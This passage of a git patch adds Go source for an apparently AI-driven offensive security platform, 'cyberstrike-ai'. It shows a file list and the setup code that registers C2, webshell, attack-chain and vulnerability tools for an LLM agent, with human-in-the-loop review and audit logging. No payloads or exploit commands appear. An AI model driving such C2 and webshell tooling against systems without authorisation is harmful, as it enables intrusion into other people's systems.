From 5aa2c382b047f3f25fa3db15d0e8698c02839d59 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=85=AC=E6=98=8E?= <83812544+Ed1s0nZ@users.noreply.github.com> Date: Tue, 18 Aug 2026 20:34:53 +0800 Subject: [PATCH] Add files via upload --- internal/app/app.go | 2256 +++++++++++++++++ internal/app/asset_tools.go | 511 ++++ internal/app/asset_tools_test.go | 201 ++ internal/app/c2_hitl_bridge.go | 228 ++ internal/app/c2_lifecycle.go | 104 + internal/app/c2_tools.go | 919 +++++++ internal/app/c2_tools_test.go | 69 + internal/app/cors_security_test.go | 105 + internal/app/main_server_http_redirect.go | 213 ++ .../app/main_server_http_redirect_test.go | 150 ++ internal/app/main_server_tls.go | 86 + internal/app/mcp_authorization.go | 407 +++ internal/app/mcp_authorization_test.go | 261 ++ internal/app/mcp_http_auth_test.go | 59 + internal/app/mcp_project_scope.go | 26 + internal/app/project_fact_tools.go | 389 +++ internal/app/vision_tools.go | 13 + internal/app/vulnerability_tools.go | 466 ++++ internal/database/asset.go | 1373 ++++++++++ internal/database/asset_test.go | 449 ++++ internal/database/attackchain.go | 167 ++ internal/database/audit.go | 222 ++ internal/database/audit_time_test.go | 75 + internal/database/batch_task.go | 631 +++++ internal/database/c2.go | 1948 ++++++++++++++ internal/database/c2_payload.go | 30 + internal/database/chat_upload.go | 56 + internal/database/conversation.go | 1817 +++++++++++++ .../database/conversation_cleanup_test.go | 108 + internal/database/conversation_create_meta.go | 32 + .../conversation_project_filter_test.go | 60 + internal/database/conversation_turn_test.go | 39 + .../conversation_vulnerability_test.go | 69 + internal/database/database.go | 1829 +++++++++++++ internal/database/group.go | 486 ++++ internal/database/hitl_logs.go | 75 + internal/database/hitl_logs_test.go | 106 + internal/database/monitor.go | 1105 ++++++++ internal/database/monitor_reconcile_test.go | 102 + internal/database/monitor_retention_test.go | 122 + internal/database/monitor_summary_test.go | 132 + internal/database/plantask.go | 125 + internal/database/plantask_test.go | 104 + internal/database/process_detail_dedupe.go | 28 + .../database/process_details_summary_test.go | 182 ++ internal/database/project.go | 635 +++++ internal/database/project_dashboard.go | 112 + internal/database/project_fact_edges.go | 410 +++ internal/database/project_fact_upsert_test.go | 148 ++ internal/database/project_search_test.go | 82 + internal/database/project_stats.go | 125 + internal/database/project_time_test.go | 93 + internal/database/rbac.go | 1454 +++++++++++ internal/database/rbac_access_test.go | 727 ++++++ internal/database/robot_identity.go | 174 ++ internal/database/robot_identity_test.go | 89 + internal/database/robot_session.go | 93 + internal/database/skill_stats.go | 142 ++ internal/database/sqltime.go | 33 + .../database/tool_execution_args_lookup.go | 57 + internal/database/vulnerability.go | 547 ++++ internal/database/vulnerability_alert.go | 215 ++ internal/database/vulnerability_alert_test.go | 88 + internal/database/webshell.go | 178 ++ internal/database/workflow.go | 468 ++++ internal/database/workflow_package.go | 286 +++ internal/database/workflow_package_test.go | 74 + internal/llm/agentic_chat_adapter.go | 125 + internal/llm/claude.go | 60 + internal/llm/deepseek_anthropic_compat.go | 76 + .../llm/deepseek_anthropic_compat_test.go | 55 + internal/project/blackboard.go | 99 + internal/project/blackboard_refresh.go | 56 + internal/project/blackboard_refresh_test.go | 154 ++ internal/project/fact_body_links.go | 256 ++ internal/project/fact_body_links_test.go | 68 + internal/project/fact_edges.go | 407 +++ internal/project/fact_edges_apply.go | 96 + internal/project/fact_edges_test.go | 296 +++ internal/project/fact_index_links.go | 231 ++ internal/project/fact_index_links_test.go | 161 ++ internal/project/fact_recording_prompt.go | 23 + internal/project/fact_template.go | 135 + internal/project/fact_template_test.go | 42 + internal/project/scope_block.go | 99 + internal/project/scope_block_test.go | 40 + internal/project/stats.go | 21 + internal/project/vision_image_prompt.go | 26 + internal/project/workspace.go | 69 + internal/project/workspace_test.go | 58 + internal/termout/startup.go | 67 + internal/termout/startup_test.go | 76 + internal/termout/style.go | 108 + internal/termout/width.go | 73 + 94 files changed, 27142 insertions(+) create mode 100644 internal/app/app.go create mode 100644 internal/app/asset_tools.go create mode 100644 internal/app/asset_tools_test.go create mode 100644 internal/app/c2_hitl_bridge.go create mode 100644 internal/app/c2_lifecycle.go create mode 100644 internal/app/c2_tools.go create mode 100644 internal/app/c2_tools_test.go create mode 100644 internal/app/cors_security_test.go create mode 100644 internal/app/main_server_http_redirect.go create mode 100644 internal/app/main_server_http_redirect_test.go create mode 100644 internal/app/main_server_tls.go create mode 100644 internal/app/mcp_authorization.go create mode 100644 internal/app/mcp_authorization_test.go create mode 100644 internal/app/mcp_http_auth_test.go create mode 100644 internal/app/mcp_project_scope.go create mode 100644 internal/app/project_fact_tools.go create mode 100644 internal/app/vision_tools.go create mode 100644 internal/app/vulnerability_tools.go create mode 100644 internal/database/asset.go create mode 100644 internal/database/asset_test.go create mode 100644 internal/database/attackchain.go create mode 100644 internal/database/audit.go create mode 100644 internal/database/audit_time_test.go create mode 100644 internal/database/batch_task.go create mode 100644 internal/database/c2.go create mode 100644 internal/database/c2_payload.go create mode 100644 internal/database/chat_upload.go create mode 100644 internal/database/conversation.go create mode 100644 internal/database/conversation_cleanup_test.go create mode 100644 internal/database/conversation_create_meta.go create mode 100644 internal/database/conversation_project_filter_test.go create mode 100644 internal/database/conversation_turn_test.go create mode 100644 internal/database/conversation_vulnerability_test.go create mode 100644 internal/database/database.go create mode 100644 internal/database/group.go create mode 100644 internal/database/hitl_logs.go create mode 100644 internal/database/hitl_logs_test.go create mode 100644 internal/database/monitor.go create mode 100644 internal/database/monitor_reconcile_test.go create mode 100644 internal/database/monitor_retention_test.go create mode 100644 internal/database/monitor_summary_test.go create mode 100644 internal/database/plantask.go create mode 100644 internal/database/plantask_test.go create mode 100644 internal/database/process_detail_dedupe.go create mode 100644 internal/database/process_details_summary_test.go create mode 100644 internal/database/project.go create mode 100644 internal/database/project_dashboard.go create mode 100644 internal/database/project_fact_edges.go create mode 100644 internal/database/project_fact_upsert_test.go create mode 100644 internal/database/project_search_test.go create mode 100644 internal/database/project_stats.go create mode 100644 internal/database/project_time_test.go create mode 100644 internal/database/rbac.go create mode 100644 internal/database/rbac_access_test.go create mode 100644 internal/database/robot_identity.go create mode 100644 internal/database/robot_identity_test.go create mode 100644 internal/database/robot_session.go create mode 100644 internal/database/skill_stats.go create mode 100644 internal/database/sqltime.go create mode 100644 internal/database/tool_execution_args_lookup.go create mode 100644 internal/database/vulnerability.go create mode 100644 internal/database/vulnerability_alert.go create mode 100644 internal/database/vulnerability_alert_test.go create mode 100644 internal/database/webshell.go create mode 100644 internal/database/workflow.go create mode 100644 internal/database/workflow_package.go create mode 100644 internal/database/workflow_package_test.go create mode 100644 internal/llm/agentic_chat_adapter.go create mode 100644 internal/llm/claude.go create mode 100644 internal/llm/deepseek_anthropic_compat.go create mode 100644 internal/llm/deepseek_anthropic_compat_test.go create mode 100644 internal/project/blackboard.go create mode 100644 internal/project/blackboard_refresh.go create mode 100644 internal/project/blackboard_refresh_test.go create mode 100644 internal/project/fact_body_links.go create mode 100644 internal/project/fact_body_links_test.go create mode 100644 internal/project/fact_edges.go create mode 100644 internal/project/fact_edges_apply.go create mode 100644 internal/project/fact_edges_test.go create mode 100644 internal/project/fact_index_links.go create mode 100644 internal/project/fact_index_links_test.go create mode 100644 internal/project/fact_recording_prompt.go create mode 100644 internal/project/fact_template.go create mode 100644 internal/project/fact_template_test.go create mode 100644 internal/project/scope_block.go create mode 100644 internal/project/scope_block_test.go create mode 100644 internal/project/stats.go create mode 100644 internal/project/vision_image_prompt.go create mode 100644 internal/project/workspace.go create mode 100644 internal/project/workspace_test.go create mode 100644 internal/termout/startup.go create mode 100644 internal/termout/startup_test.go create mode 100644 internal/termout/style.go create mode 100644 internal/termout/width.go diff --git a/internal/app/app.go b/internal/app/app.go new file mode 100644 index 00000000..7cf5b079 --- /dev/null +++ b/internal/app/app.go @@ -0,0 +1,2256 @@ +package app + +import ( + "context" + "crypto/subtle" + "crypto/tls" + "database/sql" + "fmt" + "net" + "net/http" + "net/url" + "os" + "path/filepath" + "strings" + "sync" + "time" + + "cyberstrike-ai/internal/agent" + "cyberstrike-ai/internal/audit" + "cyberstrike-ai/internal/authctx" + "cyberstrike-ai/internal/c2" + "cyberstrike-ai/internal/config" + "cyberstrike-ai/internal/database" + "cyberstrike-ai/internal/einoobserve" + "cyberstrike-ai/internal/handler" + "cyberstrike-ai/internal/hitl" + "cyberstrike-ai/internal/knowledge" + "cyberstrike-ai/internal/logger" + "cyberstrike-ai/internal/mcp" + "cyberstrike-ai/internal/mcp/builtin" + "cyberstrike-ai/internal/monitor" + "cyberstrike-ai/internal/multiagent" + "cyberstrike-ai/internal/robot" + "cyberstrike-ai/internal/security" + "cyberstrike-ai/internal/skillpackage" + + "github.com/gin-gonic/gin" + "github.com/google/uuid" + "go.uber.org/zap" + "golang.org/x/net/http2" +) + +// App 应用 +type App struct { + config *config.Config + logger *logger.Logger + router *gin.Engine + mcpServer *mcp.Server + externalMCPMgr *mcp.ExternalMCPManager + agent *agent.Agent + executor *security.Executor + db *database.DB + knowledgeDB *database.DB // 知识库数据库连接(如果使用独立数据库) + auth *security.AuthManager + knowledgeManager *knowledge.Manager // 知识库管理器(用于动态初始化) + knowledgeRetriever *knowledge.Retriever // 知识库检索器(用于动态初始化) + knowledgeIndexer *knowledge.Indexer // 知识库索引器(用于动态初始化) + knowledgeHandler *handler.KnowledgeHandler // 知识库处理器(用于动态初始化) + agentHandler *handler.AgentHandler // Agent处理器(用于更新知识库管理器) + robotHandler *handler.RobotHandler // 机器人处理器(钉钉/飞书/企业微信等) + robotMu sync.Mutex // 保护机器人长连接的 cancel + dingCancel context.CancelFunc // 钉钉 Stream 取消函数,用于配置变更时重启 + larkCancel context.CancelFunc // 飞书长连接取消函数,用于配置变更时重启 + wechatCancel context.CancelFunc // 微信 iLink 长轮询取消函数 + telegramCancel context.CancelFunc // Telegram 长轮询取消函数 + slackCancel context.CancelFunc // Slack Socket Mode 取消函数 + discordCancel context.CancelFunc // Discord Gateway 取消函数 + qqCancel context.CancelFunc // QQ WebSocket 取消函数 + alertCancel context.CancelFunc // 漏洞提醒持久化投递 worker + c2Manager *c2.Manager // C2 管理器(未启用 C2 时为 nil) + c2Watchdog *c2.SessionWatchdog // C2 会话看门狗 + c2WatchdogCancel context.CancelFunc // 看门狗取消函数 + c2Handler *handler.C2Handler // C2 REST(与 Manager 生命周期同步) + auditSvc *audit.Service +} + +// New 创建新应用 +func New(cfg *config.Config, log *logger.Logger, configPath string) (*App, error) { + if err := multiagent.InitADK(); err != nil { + return nil, fmt.Errorf("初始化 Eino ADK: %w", err) + } + + gin.SetMode(gin.ReleaseMode) + router := gin.Default() + + // CORS中间件 + router.Use(corsMiddleware(cfg.Server.CORSAllowedOrigins)) + + // 初始化数据库 + dbPath := cfg.Database.Path + if dbPath == "" { + dbPath = "data/conversations.db" + } + + // 确保目录存在 + if err := os.MkdirAll(filepath.Dir(dbPath), 0755); err != nil { + return nil, fmt.Errorf("创建数据库目录失败: %w", err) + } + + db, err := database.NewDB(dbPath, log.Logger) + if err != nil { + return nil, fmt.Errorf("初始化数据库失败: %w", err) + } + + // 认证管理器(数据库初始化后挂载 RBAC) + authManager := security.NewAuthManager(cfg.Auth.SessionDurationHours) + if generatedPassword, err := authManager.AttachRBACStore(db); err != nil { + return nil, fmt.Errorf("初始化RBAC失败: %w", err) + } else if generatedPassword != "" { + config.PrintBootstrapAdminPassword(generatedPassword) + } + for platform, userID := range cfg.Robots.ServiceAccountUserIDs() { + user, userErr := db.GetRBACUserByID(userID) + if userErr != nil || !user.Enabled { + return nil, fmt.Errorf("robots.%s.auth.service_user_id 必须指向已启用的 RBAC 用户", platform) + } + } + + auditSvc := audit.NewService(db, cfg, log.Logger) + audit.RegisterConversationCreateHook(auditSvc) + auditSvc.PurgeExpired() + audit.StartRetentionLoop(auditSvc, log.Logger) + if err := db.PurgeWorkflowPackageLifecycle(time.Now().UTC()); err != nil { + log.Logger.Warn("清理过期工作流包记录失败", zap.Error(err)) + } + go func() { + ticker := time.NewTicker(time.Hour) + defer ticker.Stop() + for range ticker.C { + if err := db.PurgeWorkflowPackageLifecycle(time.Now().UTC()); err != nil { + log.Logger.Warn("清理过期工作流包记录失败", zap.Error(err)) + } + } + }() + + monitorRetention := monitor.NewService(db, cfg, log.Logger) + monitorRetention.PurgeExpired() + monitor.StartRetentionLoop(monitorRetention, log.Logger) + + if err := handler.NewHITLManager(db, log.Logger).EnsureSchema(); err != nil { + log.Logger.Warn("初始化 HITL 表失败", zap.Error(err)) + } + hitlRetention := hitl.NewService(db, cfg, log.Logger) + hitlRetention.PurgeExpired() + hitl.StartRetentionLoop(hitlRetention, log.Logger) + + // 创建MCP服务器(带数据库持久化) + mcpServer := mcp.NewServerWithStorage(log.Logger, db) + mcpServer.SetToolAuthorizer(mcpToolAuthorizer(db)) + mcpServer.ConfigureHTTPToolCallTimeoutFromAgentMinutes(cfg.Agent.ToolTimeoutMinutes) + mcpServer.ConfigureToolWaitTimeoutSeconds(cfg.Agent.ToolWaitTimeoutSeconds) + mcpServer.ConfigureToolResultMaxBytes(cfg.MultiAgent.EinoMiddleware.ReductionMaxLengthForTruncEffective()) + mcpServer.ConfigureToolResultSpillRoot(cfg.MultiAgent.EinoMiddleware.ReductionRootDir) + + // 创建安全工具执行器 + executor := security.NewExecutor(&cfg.Security, mcpServer, log.Logger) + executor.SetShellNoOutputTimeoutSeconds(cfg.Agent.ShellNoOutputTimeoutSeconds) + executor.SetToolOutputMaxBytes(cfg.MultiAgent.EinoMiddleware.ReductionMaxLengthForTruncEffective()) + executor.SetToolOutputSpillRoot(cfg.MultiAgent.EinoMiddleware.ReductionRootDir) + + // 注册工具 + executor.RegisterTools(mcpServer) + + // 注册漏洞记录工具 + registerVulnerabilityTools(mcpServer, db, log.Logger) + registerAssetTools(mcpServer, db, log.Logger) + registerProjectFactTools(mcpServer, db, cfg, log.Logger) + registerVisionTools(mcpServer, cfg, log.Logger) + + // 创建外部MCP管理器(使用与内部MCP服务器相同的存储) + externalMCPMgr := mcp.NewExternalMCPManagerWithStorage(log.Logger, db) + externalMCPMgr.SetToolAuthorizer(externalMCPToolAuthorizer()) + externalMCPMgr.ConfigureToolWaitTimeoutSeconds(cfg.Agent.ToolWaitTimeoutSeconds) + externalMCPMgr.ConfigureToolResultMaxBytes(cfg.MultiAgent.EinoMiddleware.ReductionMaxLengthForTruncEffective()) + externalMCPMgr.ConfigureToolResultSpillRoot(cfg.MultiAgent.EinoMiddleware.ReductionRootDir) + externalMCPMgr.ConfigureResilience(mcp.ExternalMCPResilienceConfig{ + MaxConcurrentPerServer: cfg.Agent.ExternalMCPMaxConcurrentPerServer, + MaxConcurrentTotal: cfg.Agent.ExternalMCPMaxConcurrentTotal, + CircuitFailureThreshold: cfg.Agent.ExternalMCPCircuitFailureThreshold, + CircuitCooldown: time.Duration(cfg.Agent.ExternalMCPCircuitCooldownSeconds) * time.Second, + }) + mcp.RegisterExecutionControlTools(mcpServer, externalMCPMgr) + if cfg.ExternalMCP.Servers != nil { + externalMCPMgr.LoadConfigs(&cfg.ExternalMCP) + // 启动所有启用的外部MCP客户端 + externalMCPMgr.StartAllEnabled() + } + + execReconciler := monitor.NewExecutionReconciler(db, mcpServer, externalMCPMgr, log.Logger) + execReconciler.ReconcileOnStartup() + monitor.StartStaleRunningReconcileLoop(execReconciler, log.Logger) + + // 创建Agent + maxIterations := cfg.Agent.MaxIterations + if maxIterations <= 0 { + maxIterations = 30 // 默认值 + } + agent := agent.NewAgent(&cfg.OpenAI, &cfg.Agent, mcpServer, externalMCPMgr, log.Logger, maxIterations) + agent.UpdateToolDescriptionMode(cfg.Security.ToolDescriptionMode) + + // 初始化知识库模块(如果启用) + var knowledgeManager *knowledge.Manager + var knowledgeRetriever *knowledge.Retriever + var knowledgeIndexer *knowledge.Indexer + var knowledgeHandler *handler.KnowledgeHandler + + var knowledgeDBConn *database.DB + log.Logger.Debug("检查知识库配置", zap.Bool("enabled", cfg.Knowledge.Enabled)) + if cfg.Knowledge.Enabled { + // 确定知识库数据库路径 + knowledgeDBPath := cfg.Database.KnowledgeDBPath + var knowledgeDB *sql.DB + + if knowledgeDBPath != "" { + // 使用独立的知识库数据库 + // 确保目录存在 + if err := os.MkdirAll(filepath.Dir(knowledgeDBPath), 0755); err != nil { + return nil, fmt.Errorf("创建知识库数据库目录失败: %w", err) + } + + var err error + knowledgeDBConn, err = database.NewKnowledgeDB(knowledgeDBPath, log.Logger) + if err != nil { + return nil, fmt.Errorf("初始化知识库数据库失败: %w", err) + } + knowledgeDB = knowledgeDBConn.DB + log.Logger.Info("使用独立的知识库数据库", zap.String("path", knowledgeDBPath)) + } else { + // 向后兼容:使用会话数据库 + knowledgeDB = db.DB + log.Logger.Info("使用会话数据库存储知识库数据(建议配置knowledge_db_path以分离数据)") + } + + // 创建知识库管理器 + knowledgeManager = knowledge.NewManager(knowledgeDB, cfg.Knowledge.BasePath, log.Logger) + + // 创建嵌入器 + // 使用OpenAI配置的API Key(如果知识库配置中没有指定) + if cfg.Knowledge.Embedding.APIKey == "" { + cfg.Knowledge.Embedding.APIKey = cfg.OpenAI.APIKey + } + if cfg.Knowledge.Embedding.BaseURL == "" { + cfg.Knowledge.Embedding.BaseURL = cfg.OpenAI.BaseURL + } + + embedder, err := knowledge.NewEmbedder(context.Background(), &cfg.Knowledge, &cfg.OpenAI, log.Logger) + if err != nil { + return nil, fmt.Errorf("初始化知识库嵌入器失败: %w", err) + } + + // 创建检索器(Eino MultiQuery + 重排流水线) + retrievalConfig := knowledge.RetrievalConfigFromYAML(cfg.Knowledge.Retrieval) + knowledgeRetriever = knowledge.NewRetriever(knowledgeDB, embedder, retrievalConfig, log.Logger) + if err := knowledge.WireRetrieverPipeline(context.Background(), knowledgeRetriever, &cfg.OpenAI); err != nil { + return nil, fmt.Errorf("初始化知识库检索流水线失败: %w", err) + } + + // 创建索引器(Eino Compose 链) + knowledgeIndexer, err = knowledge.NewIndexer(context.Background(), knowledgeDB, embedder, log.Logger, &cfg.Knowledge) + if err != nil { + return nil, fmt.Errorf("初始化知识库索引器失败: %w", err) + } + + // 注册知识检索工具到MCP服务器 + knowledge.RegisterKnowledgeTool(mcpServer, knowledgeRetriever, knowledgeManager, log.Logger) + + // 创建知识库API处理器 + knowledgeHandler = handler.NewKnowledgeHandler(knowledgeManager, knowledgeRetriever, knowledgeIndexer, db, log.Logger) + knowledgeHandler.SetAudit(auditSvc) + log.Logger.Info("知识库模块初始化完成", zap.Bool("handler_created", knowledgeHandler != nil)) + + // 扫描知识库并建立索引(异步) + go func() { + itemsToIndex, err := knowledgeManager.ScanKnowledgeBase() + if err != nil { + log.Logger.Warn("扫描知识库失败", zap.Error(err)) + return + } + + // 检查是否已有索引 + hasIndex, err := knowledgeIndexer.HasIndex() + if err != nil { + log.Logger.Warn("检查索引状态失败", zap.Error(err)) + return + } + + if hasIndex { + // 如果已有索引,只索引新添加或更新的项 + if len(itemsToIndex) > 0 { + log.Logger.Info("检测到已有知识库索引,开始增量索引", zap.Int("count", len(itemsToIndex))) + ctx := context.Background() + consecutiveFailures := 0 + var firstFailureItemID string + var firstFailureError error + failedCount := 0 + + for _, itemID := range itemsToIndex { + if err := knowledgeIndexer.IndexItem(ctx, itemID); err != nil { + failedCount++ + consecutiveFailures++ + + if consecutiveFailures == 1 { + firstFailureItemID = itemID + firstFailureError = err + log.Logger.Warn("索引知识项失败", zap.String("itemId", itemID), zap.Error(err)) + } + + // 如果连续失败2次,立即停止增量索引 + if consecutiveFailures >= 2 { + log.Logger.Error("连续索引失败次数过多,立即停止增量索引", + zap.Int("consecutiveFailures", consecutiveFailures), + zap.Int("totalItems", len(itemsToIndex)), + zap.String("firstFailureItemId", firstFailureItemID), + zap.Error(firstFailureError), + ) + break + } + continue + } + + // 成功时重置连续失败计数 + if consecutiveFailures > 0 { + consecutiveFailures = 0 + firstFailureItemID = "" + firstFailureError = nil + } + } + log.Logger.Info("增量索引完成", zap.Int("totalItems", len(itemsToIndex)), zap.Int("failedCount", failedCount)) + } else { + log.Logger.Info("检测到已有知识库索引,没有需要索引的新项或更新项") + } + return + } + + // 冷启动:仅为尚无向量的知识项构建索引(与 IndexMissing 语义一致) + log.Logger.Info("未检测到知识库索引,开始自动构建索引") + ctx := context.Background() + if err := knowledgeIndexer.IndexMissing(ctx); err != nil { + log.Logger.Warn("自动构建知识库索引失败", zap.Error(err)) + } + }() + } + + // 配置文件路径必须由入口传入(与 flag -config 一致)。勿再用 os.Args[1],否则 ./cyberstrike-ai --https 会把 --https 当成路径。 + configPath = strings.TrimSpace(configPath) + if configPath == "" { + configPath = "config.yaml" + } + + skillsDir := skillpackage.SkillsRootFromConfig(cfg.SkillsDir, configPath) + log.Logger.Debug("Skills 目录(Eino ADK skill 中间件 + Web 管理 API)", zap.String("skillsDir", skillsDir)) + configDir := filepath.Dir(configPath) + plantaskRel := strings.TrimSpace(cfg.MultiAgent.EinoMiddleware.PlantaskRelDir) + if plantaskRel == "" { + plantaskRel = ".eino/plantask" + } + plantaskBase := filepath.Join(skillsDir, plantaskRel) + // Match eino_adk_run_loop: checkpoint_dir is used as configured (relative to process CWD when not absolute). + checkpointBase := strings.TrimSpace(cfg.MultiAgent.EinoMiddleware.CheckpointDir) + reductionRoot := strings.TrimSpace(cfg.MultiAgent.EinoMiddleware.ReductionRootDir) + workspaceRoot := strings.TrimSpace(cfg.Agent.WorkspaceRootDir) + db.SetEinoConversationDirs(plantaskBase, checkpointBase, reductionRoot, workspaceRoot) + agent.SetPromptBaseDir(configDir) + + agentsDir := cfg.AgentsDir + if agentsDir == "" { + agentsDir = "agents" + } + if !filepath.IsAbs(agentsDir) { + agentsDir = filepath.Join(configDir, agentsDir) + } + if err := os.MkdirAll(agentsDir, 0755); err != nil { + log.Logger.Warn("创建 agents 目录失败", zap.String("path", agentsDir), zap.Error(err)) + } + markdownAgentsHandler := handler.NewMarkdownAgentsHandler(agentsDir) + markdownAgentsHandler.SetAudit(auditSvc) + log.Logger.Debug("多代理 Markdown 子 Agent 目录", zap.String("agentsDir", agentsDir)) + + // 创建处理器 + agentHandler := handler.NewAgentHandler(agent, db, cfg, log.Logger) + agentHandler.SetAudit(auditSvc) + agentHandler.SetAgentsMarkdownDir(agentsDir) + // 如果知识库已启用,设置知识库管理器到AgentHandler以便记录检索日志 + if knowledgeManager != nil { + agentHandler.SetKnowledgeManager(knowledgeManager) + } + monitorHandler := handler.NewMonitorHandler(mcpServer, executor, db, log.Logger) + monitorHandler.SetAudit(auditSvc) + monitorHandler.SetMonitorRetention(monitorRetention) + monitorHandler.SetExternalMCPManager(externalMCPMgr) // 设置外部MCP管理器,以便获取外部MCP执行记录 + monitorHandler.SetTaskManager(agentHandler.TaskManager()) + monitorHandler.SetAgentHandler(agentHandler) + notificationHandler := handler.NewNotificationHandler(db, agentHandler, log.Logger) + groupHandler := handler.NewGroupHandler(db, log.Logger) + authHandler := handler.NewAuthHandler(authManager, cfg, configPath, log.Logger) + authHandler.SetAudit(auditSvc) + attackChainHandler := handler.NewAttackChainHandler(db, &cfg.OpenAI, log.Logger) + vulnerabilityHandler := handler.NewVulnerabilityHandler(db, log.Logger) + assetHandler := handler.NewAssetHandler(db, log.Logger) + projectHandler := handler.NewProjectHandler(db, log.Logger) + rbacHandler := handler.NewRBACHandler(db, log.Logger) + rbacHandler.SetAudit(auditSvc) + rbacHandler.SetAuthManager(authManager) + workflowHandler := handler.NewWorkflowHandler(db, log.Logger) + workflowHandler.SetAudit(auditSvc) + workflowHandler.SetRuntime(agent, cfg) + vulnerabilityHandler.SetAudit(auditSvc) + webshellHandler := handler.NewWebShellHandler(log.Logger, db) + webshellHandler.SetAudit(auditSvc) + chatUploadsHandler := handler.NewChatUploadsHandler(log.Logger, db) + chatUploadsHandler.SetAudit(auditSvc) + registerWebshellTools(mcpServer, db, webshellHandler, log.Logger) + registerWebshellManagementTools(mcpServer, db, webshellHandler, log.Logger) + configHandler := handler.NewConfigHandler(configPath, cfg, mcpServer, executor, agent, attackChainHandler, externalMCPMgr, log.Logger) + configHandler.SetDB(db) + configHandler.SetAudit(auditSvc) + agentHandler.SetHitlToolWhitelistSaver(configHandler) + agentHandler.SetHitlAuditStrategySaver(configHandler) + agentHandler.SetHitlDefaultReviewerSaver(configHandler) + externalMCPHandler := handler.NewExternalMCPHandler(externalMCPMgr, cfg, configPath, log.Logger) + externalMCPHandler.SetAudit(auditSvc) + roleHandler := handler.NewRoleHandler(cfg, configPath, log.Logger) + roleHandler.SetAudit(auditSvc) + skillsHandler := handler.NewSkillsHandler(cfg, configPath, log.Logger) + skillsHandler.SetAudit(auditSvc) + fofaHandler := handler.NewFofaHandler(cfg, log.Logger) + terminalHandler := handler.NewTerminalHandler(log.Logger) + if db != nil { + skillsHandler.SetDB(db) // 设置数据库连接以便获取调用统计 + } + + // ============================================================================ + // 初始化 C2 模块(可按配置关闭,节省本机部署资源) + // ============================================================================ + c2Manager, c2Watchdog, watchdogCancel := setupC2Runtime(cfg, db, agentHandler, log.Logger) + if c2Manager != nil { + registerC2Tools(mcpServer, c2Manager, log.Logger, cfg.Server.Port) + } + c2Handler := handler.NewC2Handler(c2Manager, log.Logger) + c2Handler.SetAudit(auditSvc) + + // 创建OpenAPI处理器 + conversationHandler := handler.NewConversationHandler(db, log.Logger) + conversationHandler.SetAudit(auditSvc) + conversationHandler.SetTaskStopper(agentHandler) + conversationHandler.SetTaskStateProvider(agentHandler) + auditHandler := handler.NewAuditHandler(db, auditSvc, log.Logger) + robotHandler := handler.NewRobotHandler(cfg, db, agentHandler, log.Logger) + robotHandler.SetAudit(auditSvc) + db.SetVulnerabilityCreatedHook(robotHandler.NotifyNewVulnerability) + openAPIHandler := handler.NewOpenAPIHandler(db, log.Logger, conversationHandler, agentHandler) + + // 创建 App 实例(部分字段稍后填充) + app := &App{ + config: cfg, + logger: log, + router: router, + mcpServer: mcpServer, + externalMCPMgr: externalMCPMgr, + agent: agent, + executor: executor, + db: db, + knowledgeDB: knowledgeDBConn, + auth: authManager, + knowledgeManager: knowledgeManager, + knowledgeRetriever: knowledgeRetriever, + knowledgeIndexer: knowledgeIndexer, + knowledgeHandler: knowledgeHandler, + agentHandler: agentHandler, + robotHandler: robotHandler, + c2Manager: c2Manager, + c2Watchdog: c2Watchdog, + c2WatchdogCancel: watchdogCancel, + c2Handler: c2Handler, + auditSvc: auditSvc, + } + // 飞书/钉钉长连接(无需公网),启用时在后台启动;后续前端应用配置时会通过 RestartRobotConnections 重启 + app.startRobotConnections() + alertCtx, alertCancel := context.WithCancel(context.Background()) + app.alertCancel = alertCancel + go robotHandler.RunVulnerabilityAlertWorker(alertCtx) + + // 设置漏洞工具注册器(内置工具,必须设置) + vulnerabilityRegistrar := func() error { + registerVulnerabilityTools(mcpServer, db, log.Logger) + registerAssetTools(mcpServer, db, log.Logger) + registerProjectFactTools(mcpServer, db, cfg, log.Logger) + registerVisionTools(mcpServer, cfg, log.Logger) + return nil + } + configHandler.SetVulnerabilityToolRegistrar(vulnerabilityRegistrar) + + // 设置 WebShell 工具注册器(ApplyConfig 时重新注册) + webshellRegistrar := func() error { + registerWebshellTools(mcpServer, db, webshellHandler, log.Logger) + registerWebshellManagementTools(mcpServer, db, webshellHandler, log.Logger) + return nil + } + configHandler.SetWebshellToolRegistrar(webshellRegistrar) + + // Skills 由 Eino ADK skill 中间件提供(多代理);此处不注册 MCP 形态的技能工具 + configHandler.SetSkillsToolRegistrar(func() error { return nil }) + + handler.RegisterBatchTaskMCPTools(mcpServer, agentHandler, log.Logger) + batchTaskToolRegistrar := func() error { + handler.RegisterBatchTaskMCPTools(mcpServer, agentHandler, log.Logger) + return nil + } + configHandler.SetBatchTaskToolRegistrar(batchTaskToolRegistrar) + + // 设置知识库初始化器(用于动态初始化,需要在 App 创建后设置) + configHandler.SetKnowledgeInitializer(func() (*handler.KnowledgeHandler, error) { + knowledgeHandler, err := initializeKnowledge(cfg, db, knowledgeDBConn, mcpServer, agentHandler, app, log.Logger) + if err != nil { + return nil, err + } + + // 动态初始化后,设置知识库工具注册器和检索器更新器 + // 这样后续 ApplyConfig 时就能重新注册工具了 + if app.knowledgeRetriever != nil && app.knowledgeManager != nil { + // 创建闭包,捕获knowledgeRetriever和knowledgeManager的引用 + registrar := func() error { + knowledge.RegisterKnowledgeTool(mcpServer, app.knowledgeRetriever, app.knowledgeManager, log.Logger) + return nil + } + configHandler.SetKnowledgeToolRegistrar(registrar) + // 设置检索器更新器,以便在ApplyConfig时更新检索器配置 + configHandler.SetRetrieverUpdater(app.knowledgeRetriever) + log.Logger.Info("动态初始化后已设置知识库工具注册器和检索器更新器") + } + + return knowledgeHandler, nil + }) + + // 如果知识库已启用,设置知识库工具注册器和检索器更新器 + if cfg.Knowledge.Enabled && knowledgeRetriever != nil && knowledgeManager != nil { + // 创建闭包,捕获knowledgeRetriever和knowledgeManager的引用 + registrar := func() error { + knowledge.RegisterKnowledgeTool(mcpServer, knowledgeRetriever, knowledgeManager, log.Logger) + return nil + } + configHandler.SetKnowledgeToolRegistrar(registrar) + // 设置检索器更新器,以便在ApplyConfig时更新检索器配置 + configHandler.SetRetrieverUpdater(knowledgeRetriever) + } + + // 设置机器人连接重启器,前端应用配置后无需重启服务即可使钉钉/飞书/微信新配置生效 + configHandler.SetRobotRestarter(app) + + wechatRobotHandler := handler.NewWechatRobotHandler(cfg, configHandler, log.Logger) + + configHandler.SetC2Runtime(app) + configHandler.SetC2ToolRegistrar(func() error { + if app.config.C2.EnabledEffective() && app.c2Manager != nil { + registerC2Tools(mcpServer, app.c2Manager, log.Logger, app.config.Server.Port) + } + return nil + }) + + // 设置路由(使用 